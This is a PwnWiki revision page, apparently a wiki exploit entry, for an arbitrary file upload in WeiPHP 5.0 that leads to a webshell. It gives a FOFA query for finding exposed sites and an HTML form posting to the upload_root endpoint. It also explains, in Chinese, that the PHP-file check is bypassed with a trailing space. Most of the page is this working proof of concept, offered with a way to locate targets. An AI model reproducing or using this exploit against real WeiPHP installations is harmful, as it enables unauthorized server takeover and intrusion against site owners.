Difference between revisions of "Weiphp5.0上傳getshell"
From PwnWiki
(Created page with "<languages /> ==FOFA== <pre> body=”weiphp5.0” </pre> ==POC== <translate> 構造html表單提交上傳: </translate> <pre> <html> <body> <form action="http://127.0.0.1/wei...") |
(Marked this version for translation) |
||
| Line 7: | Line 7: | ||
==POC== | ==POC== | ||
<translate> | <translate> | ||
| + | <!--T:1--> | ||
構造html表單提交上傳: | 構造html表單提交上傳: | ||
</translate> | </translate> | ||
| Line 23: | Line 24: | ||
</pre> | </pre> | ||
<translate> | <translate> | ||
| + | <!--T:2--> | ||
用表單進行提交,上傳成功(由於該代碼有驗證是否為php,所以空格繞過即可) | 用表單進行提交,上傳成功(由於該代碼有驗證是否為php,所以空格繞過即可) | ||
</translate> | </translate> | ||
[[File: Xnip2021-06-30_09-31-34.jpg| 800px]] | [[File: Xnip2021-06-30_09-31-34.jpg| 800px]] | ||
Latest revision as of 09:33, 30 June 2021
FOFA
body=”weiphp5.0”
POC
構造html表單提交上傳:
<html> <body> <form action="http://127.0.0.1/weiphp/public/index.php/home/File/upload_root" method="post" enctype="multipart/form-data"> <label for="file">Filename:</label> <input type="file" name="download" id="file" /> <br /> <input type="submit" name="submit" value="Submit" /> </form> </body> </html>
用表單進行提交,上傳成功(由於該代碼有驗證是否為php,所以空格繞過即可)
